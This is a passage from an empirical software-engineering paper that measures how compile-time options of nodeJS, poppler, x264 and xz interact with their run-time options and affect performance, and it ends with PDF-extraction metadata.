software systems listed in Table 1. In addition, we have made sure that the software processes input data \(I\) (e.g., a performance test suite), so we can experiment the options in different and realistic scenarios. 3.1.1 nodeJS. nodeJS\(^3\) is a widely-used JavaScript execution environment (78k stars on Github) \([9, 10, 21]\). Inputs \(I\). We execute different JavaScript programs extracted from the nodeJS benchmark test suite. Configurations \(C\) and \(R\). We manually selected compile-time options (e.g., \(v8-lite-mode\) or \(enable-lto\)) that could change the way the executable behaves. We also selected run-time options that were supposed to impact the performances according to the documentation\(^4\), like \(jitless\) or \(node-memory-debug\). Additionally, we added experimental features (e.g., \(experimental-wasm-modules\) or \(experimental-vm-modules\)). Performances \(P\). We measured the rate of operations (measured in operations per seconds) performed by the selected test suite. 3.1.2 poppler. poppler\(^5\) is a library for rendering PDF files \([27, 34]\). We focus on the poppler tool \(pdfimages\) that extracts images from PDF files\(^6\). Inputs \(I\). We tested \(pdfimages\) on a series of ten PDF files containing ten books on computer science. These books also have different: number of pages; illustration-text ratio; image resolutions; numbers of images; sizes (from 0.8 MB to 40.3 MB). Configurations \(C\) and \(R\). We selected the compile-time options that select the compression algorithm to be used at run time (e.g., \(libjpeg\) vs \(openjpeg\)): those different compression algorithms may be sensitive to the selected run-time options. The run-time options we selected are related to compression formats to maximize the potential variation impacts on performance. Performances \(P\). We systematically measured: the user time; the time needed to extract the pictures (with the tool \(time\)) in seconds; the size of the output pictures, in bytes. 3.1.3 x264. x264\(^7\) (version 0.161.3048) is a video encoder that uses the H264 format \([1, 35]\). Inputs \(I\). As input data, we selected eight videos extracted from the Youtube UGC Dataset \([68]\), having different categories (Animation video, Gaming video, etc.), different resolutions (e.g., 360p, 420p) and different sizes. This dataset is intended for the study of the performances of compression software, which is adapted to our case. Configurations \(C\) and \(R\). For x264, we selected compile-time options related to performance (e.g., \(enable-asm\)) or to libraries related to hardware capacities (e.g., \(disable-opencl\)). Those compile-time options may interact with runtime options, linked to the different stages of video compression. Performances \(P\). We measured five different non-functional properties of x264: the time needed to encode the video (with \(time\)); the size (in bytes) of the encoded video; the \(bitrate\) (in bytes per second); the number of frames encoded per seconds. 3.1.4 xz. xz\(^8\) (version 5.3.1alpha) is a data compression tool that uses the \(xz\) and \(lzma\) formats \([6, 7, 37]\). Inputs \(I\). As input data we use the Silesia corpus \([12]\), that provides different types of file (e.g., \(^2\)https://openbenchmarking.org \(^3\)https://nodejs.org/en/ \(^4\)https://nodejs.org/api/cli.html \(^5\)https://poppler.freedesktop.org \(^6\)https://manpages.debian.org/testing/poppler-utils/pdfimages.1.en.html \(^7\)https://www.videolan.org/developers/x264.html \(^8\)https://tukaani.org/xz/ binary files, text files) with various sizes w.r.t. memory. Configurations $C$ and $R$. We manually selected compile-time options that can slow down the execution of the program (e.g., disable-threads or enable-debug), to state whether these options interact with run-time options. We selected specific run-time options related to the compression level, the format of the compression (e.g., xz or lzma), and the hardware capabilities (e.g., --memory=50\% ). Performances $P$. Like with poppler, we measured the time needed to compress the file (in seconds) and the size of the encoded files (in bytes). ### 3.2 Measuring performances #### 3.2.1 Protocol For each of these systems we measured their performances by applying the protocol detailed in Algorithm 1. ``` Algorithm 1 - Measuring performances of the chosen systems 1: Input $S$ a configurable system 2: Input $C$ compile-time configurations 3: Input $R$ run-time configurations 4: Input $I$ system inputs 5: // The inputs choices for each system are listed in Table 1 6: Init $P$ performance measurements of $S$ 7: Download the source code of $S$ 8: for each compile-time configuration $c \in C$ do 9: Compile source code of $S$ with $c$ arguments 10: for each input $i \in I$ do 11: for each run-time configuration $r \in R$ do 12: Execute the compiled code with $r$ on the input $i$ 13: end for 14: end for 15: end for 16: end for 17: Output $P$ ``` Lines 1-4. First, we define the different inputs fed to the algorithm, the first one being the configurable system $S$ we study. Then, we provide a set of compile-time configurations $C$, as well as a set of run-time configurations $R$ related to the configurable system $S$. Finally, we consider a set of input data $I$, processed by the configurable system $S$. Lines 5-6. Then, we initialize the matrix of performances $P$. Line 7. We download the source code of $S$ (via the command line 'git clone'), w.r.t. the link and the commits referenced in Table 1. We keep the same version of the system for all our experiments. If needed, we ran the scripts (e.g., autogen.sh for xz) generating the compilation files, thus enabling the manual configuration of the compilation. Lines 8-16. We apply the following process to all the compile-time configurations of $C$: based on a compile-time configuration $c$, we compile the software $S$ (de-)activating the set of options of $c$. Then, we measured the performances of the compiled $S$ when executing it on all inputs of $I$ with the different run-time configurations of $R$. Line 17. We store the results in the matrix of performances $P$ (in CSV files). We then use these measurements to generate the results for answering the research questions (see Section 4). #### 3.2.2 Replication To allow researchers to easily reproduce our experiments, we provide docker containers for each configurable system. The links are listed in Table 1 in the "Docker" column. ### 3.2.3 Hardware To avoid introducing a bias in the experiment, we measure all performances sequentially on the same server (model Intel(R) Xeon(R) CPU D-1520 @ 2.20GHz, running Ubuntu 20.04 LTS). This server was dedicated to this task, so we can ensure there is no interaction with any other processes running at the same time. ### 3.3 Analyzing run-time performances We split RQ1. Do compile-time options change the performance distributions of configurable systems? into two sub-questions. #### RQ1.1. Do the run-time performances of configurable systems vary with compile-time options? A first goal of this paper is to determine whether the compile-time options affect the run-time performances of configurable systems. To do so, we compute and analyze the distribution of all the different compile-time configurations for each run-time execution of the software system (i.e., given a input $i$ and a run-time configuration $r$, the distribution of $P[c, r, i]$ for all the compile-time configurations $c$ of $S$). All else being equal, if the compile-time options have no influence over the different executions of the system, these distributions should keep similar values. In other words, the bigger the variation of these distributions, the greater the effect of the compile-time options on run-time performances. To visualize these variations, we first display the boxplots of several run-time performances and few systems in Figure 2. Note that for x264 (Figures 2a and 2c), only an excerpt of 30 configurations is depicted. We then comment the values of the InterQuartile Range (i.e., IQR, the difference between the third and the first quartile of a distribution) for each couple of system $S$ and performance $P$. In order to state whether these variations are consistent across compile-time configurations, we then apply Wilcoxon signed-rank tests [52] (significance level of 0.05) to distributions of run-time performances, and report on the performance leading to significant differences. This test is suited to our case since our performance distributions are quantitative, paired, not normally distributed and have unequal variances. #### RQ1.2. How many performance can we gain/lose when changing the default compile-time configuration? As an outcome of RQ1.1, we isolate a few couples (system, performance) for which the way we compile the system significantly changes its run-time performances. But how much performance can we expect to gain or lose when switching the default configuration (i.e., the compilation processed without argument, with the simple command line ./configure) to another fancy configuration? In other words, RQ1.2 states if it is worth changing the default compile-time configuration in terms of run-time performances. Moreover, RQ1.2 tries to estimate the benefit of manually tuning the compile-time options to increase software performances. To quantify this gain (or loss), we compute the ratios between the run-time performances of each compile-time configuration and the run-time performances of the default compile-time configuration. A ratio of 1 for a compile-time option suggests that the run-time performances of this compile-time option are always equals to the run-time performances of the default compile-time configuration. Intuitively, if the ratio is close to 1, the effect of compile-time options is not important. An average performance ratio of 2 corresponds to a compile-time option whose... run-time performances are in average twice the default compile-time option’s performances. Section 4 details the average values and the standard deviations of these ratios for each input (row) and each couple of system and performance (column) kept in RQ1.1. We add the standard deviation of run-time performance distributions to estimate the overall variations of run-time performances due to the change of compile-time options. To complete this analysis, and as an extreme case, we also computed the best ratio values in Section 4. By best ratio, we refer to the minimal ratio for the time (e.g., reduction of encoding time for x264 or the compression time for x2) and the maximal ratio for the operation rate (i.e., increase of the number of operation executed per second for nodeJS) and the number of encoded fps (x264). As for Section 4, the best ratios are displayed for each input. 3.4 Studying the interplay of compile- and run-time options RQ1 highlights few systems and performances for which we can increase the performances by tuning their compile-time options. Now, how to achieve this tuning process, and choose the right values to tune the performances of a software system is a problem to address. In short: RQ2. How to tune software performances at the compile-time level? Again, we split this question into two parts. RQ2.1. Do compile-time options interact with the run-time options? Before tuning the software, we have to deeply understand how the different levels (here the run-time level and the compile-time level) interact with each other. The protocol of RQ1 states whether the compile-time options change the performances, but the compilation could just change the scale of the distribution, i.e., without really interacting with the run-time options. To discover such interactions, we compute the Spearman correlations [26] between the run-time performance distributions of software systems compiled with different configurations. The Spearman correlation allows us to measure if the way we compile the system change the rankings of the run-time performances. All else being equal, finding that two performance distributions, having the same run-time configurations but different compile-time configurations, are uncorrelated proves the existence of an interplay between the compile- and the run-time options. We depict a correlogram in Figure 3a. Each square (i,j), represents the Spearman correlation between the run-time performances of the compile-time configurations C#i and C#j. The color of this square respects the top-left scale: high positive correlations are red; low in white; negative in blue. Because we cannot describe each correlation individually, we added a table describing the distribution of the correlations (diagonal excluded). We apply the Evans rule [13] when interpreting these correlations. In absolute value, we refer to correlations by the following labels: very low: 0-0.19, low: 0.2-0.39, moderate: 0.4-0.59, strong: 0.6-0.79, very strong: 0.8-1.00. To complete this analysis, we train a Random Forest Regressor [42] on our measurements so it predicts the operation rate of nodeJS for a given input J. We fed this ensemble of trees with all the configuration options i.e., all the compile-time options C and the run-time options R related to the performances P are used as predicting variables in this model. We then report the feature importances [8, 36, 43] for the different options (run-time or compile-time) in Figure 3b. Intuitively, a feature is important if shuffling its values increases the prediction error. Note that each Random Forest only predicts the performances P for a given input J. The idea of this graph is to show the relative importances of the compile-time options, compared to the run-time options. RQ2.2. How to use these interactions to find a set of good compile-time options and tune the configurable system? RQ2.1. exhibits interactions between the compile-time options and the run-time options. Now, the goal is to be able to use these interactions to find a good configuration in order to optimize the performances. As in RQ2.1., we used a Random Forest Regressor [42] to predict the operation rate of nodeJS. For this research question, we split our dataset of measurements in two parts, one training part and one test part. The goal is then to use the Random Forest Regressor to predict the performance of the configurations of the test set, and then keep the one leading to the best performances. In order to estimate how many measurements we need to predict a good configuration, we vary the training size (with 1 %, 5 % and 10 % of the data). We also compute the best configuration of our dataset, that would be predicted by an oracle. We then compare the obtained configuration with the default configuration of nodeJS (i.e., the mostly used command-line, without argument, using a compiled version of nodeJS without argument). We plot the performance ratios between the predicted configuration and the default configuration of node for each input in Section 4. A performance ratio of 1.5 suggests that we found a configuration increasing the performance of default configuration by 1.5 − 1 =50 %. 4 EVALUATION Let us answer RQ1.1. Do the run-time performances of configurable systems vary with compile-time options? by distinguishing performance properties. First, the size is an extreme case of a stable performance that does not vary at all with the different compile-time options. As shown for the size of the encoded sports video in Figure 2a (boxplots), it stays the same for all compile-time configurations, leading to an average IQR of 2.3kB, negligible in comparison to the average size (3.02 MB). This conclusion applies for all the sizes we measured over the 4; the size of the compressed file for x2 (e.g., 2.6kB of IQR for I#8 having an average size of 2.85 MB) and the size of the image folder for poppler (e.g., IQR = 16kB, avg = 2.36 MB for I#2). For the size of x264, 46 % of the Wilcoxon tests do not compute because the run-time distributions were equals (i.e., same values for all sizes). The variation of the time depends on the considered system. Overall, for the execution time of poppler, it is stable (e.g., 29ms, for a execution of 2.6 s). For xz, and as depicted in Figure 2b, it seems to also depend on the run-time configurations. For instance, the distribution of the first run-time configuration (i.e., R#1) executed on I#5 has an IQR of 40ms but this number increases to 0.37s for the distribution of R#9. For the encoding time of x264 and the I#4, we can draw the same conclusion; suddenly, for a given run-time configuration (e.g., from R#102 to R#103) the execution times increases not only in average (from 0.9 s to 133 s), but also in terms of variations w.r.t. the compile-time options (IQR from 1.0 s to 223 s). Since the number of frames for a given video is fixed, these conclusion are also valid for the number of encoded fps (x264). Luc Lesoil, Mathieu Acher, Xhevahire Ternava, Arnaud Blouin, Jean-Marc Jézéquel For the number of operations executed per second (nodeJS), the IQR values of performance distribution are high: e.g., for I#3 as shown in Figure 2d in average 19 per second, for an average of 83 operations per second. However, unlike x264, these variations are quite stable across the different run-time configurations. A Wilcoxon test confirms a significant difference between run-time distributions of C#1 and C#11 (p = 4.28 * 10^-6) or C#4 and C#7 (p = 1.24 * 10^-3). **Key findings for RQ1.1.** The sizes of software systems do not depend on the compile-time options for our 3 cases. However, other performance properties such as the time or the number of operations per second can vary with different compile-time options. **RQ1.2. How many performance can we gain/lose when changing the default compile-time configuration?** As a follow-up of RQ1.1., we computed the gain/lose ratios for the sizes of poppler, x264, xz. They are all around 1.00 in average, and less than 0.01 in terms of standard deviations, whatever the input is. The same applies with poppler or with xz and their execution times, as shown in Section 4. There are few variations, less than 3% for the standard deviation of all inputs for poppler. For xz and time, we can observe the same trend. But we can observe an input sensitivity effect: for some inputs, like I#2 or I#11, the performances vary in comparison to the default one (stds at 0.48 and 0.23). Maybe the combination of an input and a compile-time option can alter the software performances. Overall, there is room for improvement when changing the default compile-time options. For example, with the operation rate of nodeJS, the average performance ratio is under 1 (e.g., 0.86 for I#3, 0.8 for I#1 and I#10). Compared to the default compile-time configuration of nodeJS, our choices of compilation options decrease the performances, by about 20%. Besides, the standard variations are relatively high: we can expect the run-time performance ratios to vary from 41% between different compile-time options for I#5, or 11% for I#4. So it can be worse than losing only 20% of operation per second. However, for I#8, there exists a run-time configuration for which we can double (i.e., multiply by 2.28) the number of operation per second) just by changing the compile-time options of nodeJS. We can draw the same conclusions for the execution time of x264: our compile-time configurations are not effective: it takes more than three times as long as the default configuration for all the inputs. But in this case, the best we can get is a decrease of 10% of the execution time, which will not have a great impact on the overall performances. We can formulate an hypothesis with Figure 2c to explain these bad results: maybe few run-time configurations (e.g., R#103 to R#109) take a lot of time to execute, thus increasing the overall average of performance ratios. Here, it would be an interaction between the run-time options and the compile-time options. **Key findings for RQ1.2.** Depending on the performance we consider, it is worth to change the compile-time options or not. For nodeJS, it can increase the operation rate up to 128% when changing the default configuration. For x264, we can gain about 10% of execution time with the tuning of compile-time options. **RQ1. Do compile-time options change the performance distributions of configurable systems?** Properties like size are extremely stable when changing the compile-time options. Performance models predicting the sizes can be generalized over different compile-time configurations. However, we found other performances, like the operation rate for nodeJS, or the execution time for xz, that are sensitive to compile-time options. It is worth to tune the compile-time options to optimize these performances. **RQ2.1. Do compile-time options interact with the run-time options?** For x264 and xz, there are few differences between the run-time distributions. As an illustration of this claim, for all the execution time distributions of x264, and all the input videos, the worst correlation is greater than 0.97 (>0.999 for x264 and encoded size, 0.55 for xz and time). This result proves that, if the compile-time options of these systems change the scale of the distribution, they do not change the rankings of run-time configurations (i.e., they do not truly interact with the run-time options). Then, we study the rankings of the run-time operation rate for nodeJS for different compile-time configurations, and details the Figure 3a. The first results are also positive. There is a large amount of compile-time configurations (top-left part of the correlogram) for which the run-time performances are moderately, strongly or even very strongly correlated. For instance, the compile-time option C#16 is very strongly (0.91) correlated with C#24 in terms of run-time performances. Similarly, compile-time options C#40 and C#23 are strongly correlated (0.73). There are less favorable cases when looking at the middle and right parts of the correlogram. For an example, C#27 and C#13 are uncorrelated (i.e., a very low correlation of 0.01). Worse, switching from compile-time option C#8 to C#29 changes the rankings to such an extent that their run-time performances are negatively correlated (~0.35). In between, poppler's performance distributions are overall not sensitive to the change of compile-time options, except for the input I #3 (for which the correlations can be negative). To complete this analysis, we discuss Figure 3b. The feature importances for predicting the operation rate of nodeJS for I #3 are distributed among the different options, both the run-time and compile-time options. If it does not prove any interaction, it signifies that to efficiently predict the operation, the algorithm has to somehow combine the different levels of options. For the input I #10, it is a bit different, since the only influential run-time option (i.e., the one that has a great importance) is jitless. When looking at a decision tree (see additional results in the companion repository), the first split of the tree uses in fact this run-time option jitless, and then split the other branches with the compile-time options –v8-lite-mode and –fully-static. **Key findings for RQ2.1.** xz, poppler and x264’s performances rankings are not sensitive to the change of compile-time options. On the other hand, nodeJS’s performances changes at run time with different the compile-options, i.e., nodeJS run-time options interact with nodeJS’s compile-time options. <table> <thead> <tr> <th>Inputs</th> <th>Training Size</th> </tr> </thead> <tbody> <tr> <td>Inputs</td> <td>0.01</td> </tr> <tr> <td>I #1</td> <td>0.94</td> </tr> <tr> <td>I #2</td> <td>1.05</td> </tr> <tr> <td>I #3</td> <td>1.167</td> </tr> <tr> <td>I #4</td> <td>1.123</td> </tr> <tr> <td>I #5</td> <td>0.96</td> </tr> <tr> <td>I #6</td> <td>1.005</td> </tr> <tr> <td>I #7</td> <td>0.986</td> </tr> <tr> <td>I #8</td> <td>1.035</td> </tr> <tr> <td>I #9</td> <td>1.034</td> </tr> <tr> <td>I #10</td> <td>1.003</td> </tr> </tbody> </table> **Table 2:** Table of run-time performance ratios (compile-time option/default) per input. An average performance ratio of 1.4 suggests that the run-time performances of a compile-time option are in average 1.4 times greater than the run-time performance of the default compile-time configuration. <table> <thead> <tr> <th>S</th> <th>nodeJS</th> <th>poppler</th> <th>x264</th> <th>xz</th> </tr> </thead> <tbody> <tr> <td></td> <td>ops</td> <td>time</td> <td>fps</td> <td>time</td> </tr> <tr> <td>I #1</td> <td>0.8 ± 0.34</td> <td>1.0 ± 0.02</td> <td>0.59 ± 0.4</td> <td>3.33 ± 2.4</td> </tr> <tr> <td>I #2</td> <td>0.79 ± 0.36</td> <td>1.0 ± 0.01</td> <td>0.59 ± 0.39</td> <td>3.5 ± 2.53</td> </tr> <tr> <td>I #3</td> <td>0.86 ± 0.2</td> <td>1.0 ± 0.01</td> <td>0.59 ± 0.4</td> <td>3.5 ± 2.57</td> </tr> <tr> <td>I #4</td> <td>1.01 ± 0.11</td> <td>1.0 ± 0.01</td> <td>0.6 ± 0.39</td> <td>3.26 ± 2.37</td> </tr> <tr> <td>I #5</td> <td>0.73 ± 0.41</td> <td>1.0 ± 0.01</td> <td>0.59 ± 0.4</td> <td>3.53 ± 2.62</td> </tr> <tr> <td>I #6</td> <td>1.05 ± 0.21</td> <td>1.0 ± 0.02</td> <td>0.6 ± 0.4</td> <td>3.35 ± 2.49</td> </tr> <tr> <td>I #7</td> <td>0.98 ± 0.01</td> <td>1.0 ± 0.07</td> <td>0.58 ± 0.4</td> <td>3.75 ± 2.8</td> </tr> <tr> <td>I #8</td> <td>0.84 ± 0.38</td> <td>1.0 ± 0.01</td> <td>0.59 ± 0.39</td> <td>3.32 ± 2.37</td> </tr> <tr> <td>I #9</td> <td>1.01 ± 0.02</td> <td>1.0 ± 0.02</td> <td>1.01 ± 0.02</td> <td></td> </tr> <tr> <td>I #10</td> <td>0.8 ± 0.34</td> <td>0.99 ± 0.03</td> <td>1.04 ± 0.11</td> <td></td> </tr> <tr> <td>I #11</td> <td></td> <td>1.08 ± 0.23</td> <td></td> <td></td> </tr> <tr> <td>I #12</td> <td></td> <td>1.02 ± 0.04</td> <td></td> <td></td> </tr> </tbody> </table> (a) Average ± standard deviation (b) Best (min for time, max for ops & fps) Our results on x264, xz, and poppler show that their performance distributions are remarkably stable whatever their compile-time options. That is, interactions between the two kinds of options are easy to manage. This is a very good news for all approaches that try to build performance models using machine learning: if \( nb_c \) and \( nb_r \) are the number of boolean options present in \( C \) and \( R \), it makes it possible to reduce the learning space to something proportional to \( 2^{nb_c} + 2^{nb_r} \) instead of \( 2^{nb_c+nb_r} = 2^{nb_c} \times 2^{nb_r} \). There are three practical opportunities (that apply to x264, xz, and poppler): **Reuse of configuration knowledge:** transfer learning of prediction models boils down to apply a linear transformation among distributions. Users can also trust the documentation of run-time options, consistent whatever the compile-time configuration is. **Tuning at lower cost:** finding the best compile-time configuration among all the possible ones allows one to immediately find the best configuration at run time. It is no longer necessary to measure many configurations at run time: the best one is transferred because of the linear relationship between compile-time configuration. Finding the best compile-time configuration is like solving a one-dimensional optimization problem: we simply compare the performances of a compilation operating on a fixed set of run-time configurations. Intuitively, it is enough to determine whether a compilation improves the performance of a limited set of run-time configurations. Theoretically, it is possible to compare the compilations’ performance on a single run-time configuration. In practice, we expect to measure \( r' \) run-time configurations with \( r' \ll 2^{nb_r} \). **Measuring at lower cost:** a common practice to measure run-time configurations is to use a default compile-time configuration. However, RQ1 results showed that it is possible to accelerate the execution time and thus drastically reduce the computational cost of measurements. That is, instead of using a default ./configure, we can use a compile-time configuration that is optimal w.r.t. cost. Then, owing to the results of RQ2.1, the measurements will transfer to any compile-time configuration and are representative of the run-time configuration space. The minimisation of the time is an example of a cost criteria; other properties such as memory or energy consumption can well be considered. It is even possible to use two compile-time configurations and executable binaries: (1) a first one to measure at lower cost and gather training samples; (2) a second one that is optimal for tuning a performance. However, for nodeJS, it requires additional (as shown in Section 4). If we had access to an oracle, we could search for the best configuration of our dataset (in terms of performance), and replace the default configuration by this one. Depending on the input script, it will improve (or not) the performances. For instance, with the input \( I \#2 \), we can expect to gain about 10 % of performance, while for \( I \#9 \) and \( I \#10 \), it would be only 4 %. The worst case is without contest \( I \#7 \), for which we lose about 1 % of operation rate. But for inputs \( I \#3 \) and \( I \#4 \), it increases the performances by respectively 50 % and 25 %. We see these cases as proofs of concept; we can use the variability induced by the compile-time options to increase the overall performances of the default configuration. And if we do not have much data, it is possible to learn from it: with only 1 % of the measurements, we can expect to gain 16 % of performance on $I^2$. It steps up to 1.37 % for 5 % of the measurements used in the training. The same applies for the input $I^4$: 12 % of gain for 1 % of the measurements and 23 % for 5 %. **Key findings for RQ2.2.** We can use the interactions between the compile-time and the run-time options to increase the default configuration’s operation rate of nodeJS (up to 50 % for $I^3$). **RQ2. How to tune software performances at the compile-time level?** Two types of systems are emerging: if the run-time options of a software system are not sensitive to compile-time options (e.g., for x264, xz, and most of the time poppler), there is an opportunity to tune “once and for all” the compilation layer for both improving the runtime performances and reducing the cost of measuring. However, for nodeJS and one specific input of poppler, we found interactions between the run-time and compile-time options, changing the rankings of their run-time performances distributions. We prove we can overcome this problem with a simple performance model using these interactions to outperform the default configuration of nodeJS. #### 5 DISCUSSION **Impacts for practitioners and researchers.** For the benefit of software variability practitioners and researchers, we give an estimate of the potential impact of tuning software during compilation. We also provide hints to choose the right values of options before compiling software systems (see RQ2.2). This may be of particular interest to developers responsible for compiling software into packages (i.e., apt, dnf, etc.). For engineers who build performance models or test the performance of software systems, we show there are opportunities to decrease the underlying cost of tuning or measuring runtime configurations. We also warn that performance models may not generalize, depending on the software and the performance studied (as shown in our study). At this step of the research, it is hard to anticipate such situations. However we recommend that practitioners verify the sensitivity of performance models w.r.t. compile-time options. Our results are also good news for researchers who build performance models using machine learning. Many works have experiments with x264 [3, 19, 53] and we show that for this system the performance is remarkably stable. xz considered in [37] also enters in this category. That is, there is no threat to validity w.r.t. compile-time options. To the best of our knowledge, other systems (nodeJS and poppler) have not been considered in the literature of configurable systems [44]. Hence we warn researchers there can be cases for which this threat applies. **Understanding the interplay.** Our results suggest that compile-time options affect specific non-functional properties of software systems. The cause of this interplay between compile-time and run-time options is unclear and remains shallow for the authors of this paper. The results could be related to the system domain, or the way it processes input data; trying to characterize the software systems sensitive to compile-time options (i.e., without measuring their performances) is challenging, but worth looking at. We are looking forward discussing with developers to know more about why it appears in these cases, and not for the other software systems (left as future work). **Other variability factors.** Compile-time options are a possible layer that can affect performance, but not the only one. Could we in the same way prove the existence of the effect of the operating system on software performances? On the hardware level? This paper is also a way for us to alert researchers to other factors of variability beyond software, which may interact with their performance. We encourage researchers to highlight these factors in their work. Similarly, the 4 software systems are evolving, with constantly new commits and features. Then, a question arises naturally: will this interplay evolve with the software? And if it changes with time and versions, how to automate the update of our understanding of these interactions? This is another challenging layer and direction to explore. In our study design we consider compile-time options and not the compiler flags. Though there is an overlap, there are many compile-time options specific to a domain and system. As future work, we plan to investigate how compiler flags (e.g., -O2 and -O3 for gcc) relate to run-time configurations. More generally, the variability of interpreters and virtual machines [25, 32, 55] can be considered as yet another variability layer [33] on which we encourage researchers to perform experiments. #### 6 RELATED WORK **Machine learning and configurable systems.** Machine learning techniques have been widely considered in the literature to learn software configuration spaces and non-functional properties of software product lines [15, 22, 23, 30, 38, 39, 41, 44, 47, 66, 67]. Several works have proposed to predict performance of configurations, with several use-cases in mind for developers and users of configurable systems: the maintenance and interpretability of configuration spaces [54], the selection of an optimal configuration [15, 39, 41], the automated specialization of configurable systems [59], etc. Studies usually support learning models restrictive to specific static settings (e.g., inputs, hardware, and version) such that a new prediction model may have to be learned from scratch or adapted once the environment change. The studies of Valov et al. [64, 66] suggest that changing the hardware has reasonable impacts since linear functions are highly accurate when reusing prediction models. Netflix conducts a large-scale study for comparing the compression performance of x264, x265, and libvpx over different inputs [1]. However, only two run-time configurations were considered on a fixed compile-time configuration. Alterations in software version [16] and changes in operating system [18] have both shown to cause variation in the results of a neuroimaging study. Jamshidi et al. [22] conducted an empirical study on four configurable systems (including x264), varying software configurations and environmental conditions, such as hardware, input, and software versions. Pereira et al. [2] and Lesoil et al. [33] empirically report that inputs can change the performance distributions of a configurable system (x264). In our study, we purposely fix the hardware and the version in order to isolate the effects of compile-time options on run time. To the best of our knowledge, our large-scale study is the first to systematically investigate the effects of compile-time options on performance of run-time configurations. The use of transfer learning techniques [23, 30, 38, 66] can be envisioned to adapt prediction models w.r.t. compile-time options. A key contribution of our study is to show that compile-time options can... change the rankings of run-time options, thus preventing the reuse of a model predicting the best run-time configuration. Input sensitivity. There are works addressing the performance analysis of software systems [11, 14, 17, 31, 46, 56] depending on different inputs (also called workloads). In our study, we also consider different inputs when measuring performances. In contrast to our work, existing studies either consider a limited set of compile-time and run-time configurations (e.g., only default configurations). It is also a threat to validity since compile-time options may change the performance distribution. In response, we perform an in-depth, controlled study of different systems to make it vary in the large, both in terms of compile-time and run-time configurations as well as inputs. In our study, we show a huge effect of inputs in the interplay of compile- and run-time options; for few inputs, the interactions of the compilation and the execution layers will not change anything, while for others, it would be a disaster to ignore them. Compiler optimizations. The problem of choosing which optimizations of a compiler to apply has a long tradition [50]. Since the mid-1990s, machine-learning-based or evolutionary approaches have been investigated to explore the configuration space of compiler [5, 20, 45, 57, 58, 61, 62]. Such works usually consider a limited set of run-time configurations in favor of a broad consideration of inputs (programs). The goal is to understand the cost-effectiveness of compiler optimizations or to find tuning techniques for specific inputs and architectures. In contrast, our goal is to understand the interplay between compile-time options and run-time options, with possible consequences on the generalization of the configuration knowledge. As discussed in Section 5, compiler flags are worth considering in future work in addition to compile-time options. 7 THREATS Construct validity. While constructing the experimental protocol and measuring the performances of software systems, we only kept a subset of all their compile-time and run-time options. The study we conducted focused on performance measurements. The risk was to handle options that have no impact on performance, letting the results irrelevant. So we drove our selection on options which documentation gives indications about potential impacts on performance. The relevance of the input data provided to software systems during the experiment is crucial. To mitigate this threat we rely on: performance tests (and the input data they use) developed and used by nodeJS; widely-used input data sets (xz and x264); a large and heterogeneous data set of PDF files (poppler). Internal Validity. Measuring non-functional properties is a complex process. During this process, the dependencies of the operating system can interact with the software system. For instance, the version of gcc could alter the way the source code is compiled, and change our conclusion. To mitigate this threat, we provided one docker container and fixed the configuration of the operating system for each subject system. However, and due to the measurement cost, we did not repeat the measurements several times. To gather measurements, we use the same dedicated server for the different subject systems. Thus, we can guarantee it was the only process running. The performances of the software systems can depend on the hardware they are executed on. To mitigate this threat we use the same hardware and provided its specifications for comparison during replications. Another threat to validity is related to the performances measured per second (e.g., the number of fps for x264). For fast run-time executions, tiny variations of the time can induce high variations of the ratio over time. To alleviate this threat, we make sure the average execution time stays always greater than one second for all the input. To learn a performance model and predict which configuration was optimal, we used a machine learning algorithm in RQ2.2, namely Random Forest. These algorithms can produce unstable results from one run to the next, which could be a problem for the results related to this research question. In order to mitigate this threat, we have kept the average value over 10 throws. 8 CONCLUSION Is there an interplay between compile-time and run-time options when it comes to performance? Our empirical study over 4 configurable software showed that two types of systems exist. In the most favorable case, compile-time options have a linear effect on the run-time configuration space. We have observed this phenomenon for two systems and several non-functional properties (e.g., execution time). There are then opportunities: the configuration knowledge generalizes no matter how the system is compiled; the performance can be further tuned through the optimisation of compile-time options and without thinking about the run-time layer; the selection of a custom compile-time configuration can reduce the cost of measuring run-time configurations. We have shown we can improve the run-time performance of these two systems, at compile-time and at lower cost. However, our study also showed that there is a subject system for which there are interactions between run-time and compile-time options. This challenging case changes the rankings of run-time performances configurations and the performance distributions. We have shown we can overcome this problem with a simple performance model using these interactions to outperform the default compile-time configuration. The fourth subject of our study is in-between: the compile-time layer strongly interacts with run-time options only when processing a specific input. For the 9 other inputs of our experiment, we can take advantage of the linear interplay. Hence it is possible but rare that there is an interplay between compile-time options, run-time options, and inputs fed to a system. Our work calls to further investigate how variability layers interact. We encourage researchers to replicate our study for different subject systems and application domains. Acknowledgments. This research was funded by the ANR-17-CE25-0010-01 VaryVary project. REFERENCES
{"Source-Url": "https://hal.archives-ouvertes.fr/hal-03286127/file/Interplay_compile_runtime.pdf", "len_cl100k_base": 13067, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 46453, "total-output-tokens": 14466, "length": "2e13", "weborganizer": {"__label__adult": 0.0003101825714111328, "__label__art_design": 0.00035119056701660156, "__label__crime_law": 0.0002315044403076172, "__label__education_jobs": 0.0006589889526367188, "__label__entertainment": 7.37309455871582e-05, "__label__fashion_beauty": 0.0001385211944580078, "__label__finance_business": 0.00015020370483398438, "__label__food_dining": 0.000263214111328125, "__label__games": 0.0006375312805175781, "__label__hardware": 0.0009565353393554688, "__label__health": 0.0003325939178466797, "__label__history": 0.00023233890533447263, "__label__home_hobbies": 7.194280624389648e-05, "__label__industrial": 0.00027871131896972656, "__label__literature": 0.00026917457580566406, "__label__politics": 0.0002130270004272461, "__label__religion": 0.0003783702850341797, "__label__science_tech": 0.0243682861328125, "__label__social_life": 8.851289749145508e-05, "__label__software": 0.008880615234375, "__label__software_dev": 0.96044921875, "__label__sports_fitness": 0.0002397298812866211, "__label__transportation": 0.00039076805114746094, "__label__travel": 0.0001709461212158203}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 58525, 0.07274]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 58525, 0.10401]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 58525, 0.87863]], "google_gemma-3-12b-it_contains_pii": [[0, 1154, false], [1154, 6941, null], [6941, 13056, null], [13056, 18537, null], [18537, 24970, null], [24970, 31951, null], [31951, 35218, null], [35218, 40559, null], [40559, 44177, null], [44177, 51129, null], [51129, 58525, null], [58525, 58525, null], [58525, 58525, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1154, true], [1154, 6941, null], [6941, 